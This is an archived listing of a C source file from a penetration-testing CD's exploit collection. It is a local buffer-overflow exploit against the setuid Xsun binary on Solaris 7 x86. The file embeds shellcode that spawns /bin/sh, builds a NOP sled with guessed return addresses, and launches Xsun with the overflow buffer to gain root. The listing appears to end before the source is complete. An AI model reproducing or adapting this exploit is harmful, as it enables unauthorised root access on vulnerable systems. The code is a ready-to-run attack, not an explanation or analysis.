home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / xsun-of-x86.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  1KB  |  50 lines

  1. /*
  2. *
  3. * Solaris 7  Xsun(suid) local overflow - PRIVATE for now!
  4. * Solaris 2.7/(2.6?) x86 sploit no sparc code, yet!
  5. *
  6. * Discovered/sploited By DiGiT - teddi@linux.is
  7. *
  8. * Greets: #!ADM, #!security.is
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13.  
  14. // Generic solaris x86 shellcode by cheeze wizz
  15.  
  16. char shellcode[] =
  17.  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  18.  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  19.  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  20.  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  21.  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  22.  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  23.  
  24. long get_esp() { __asm__("movl %esp,%eax"); }
  25.  
  26. int main(int argc, char *argv[]) {
  27.  
  28.   char buff[5000];
  29.   int nopcount=2001, bsize=4000, offset=1850;
  30.   int i;
  31.  
  32.   if (argc > 1) nopcount  = atoi(argv[1]);
  33.   if (argc > 2) bsize  = atoi(argv[2]);
  34.   if (argc > 3) offset = atoi(argv[3]);
  35.         memset (buff, 0x90, bsize); 
  36.  
  37.                 for (i = nopcount; i < bsize - 4; i += 4)
  38.                 *(long *) &buff[i] = get_esp() + offset;
  39.  
  40.         memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
  41.         (shellcode));
  42.  
  43.             memcpy (buff, ":", 1);
  44.  
  45.          printf("Oh boy. DiGiT presents r00t\n");
  46.  
  47.          execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL);
  48.  
  49.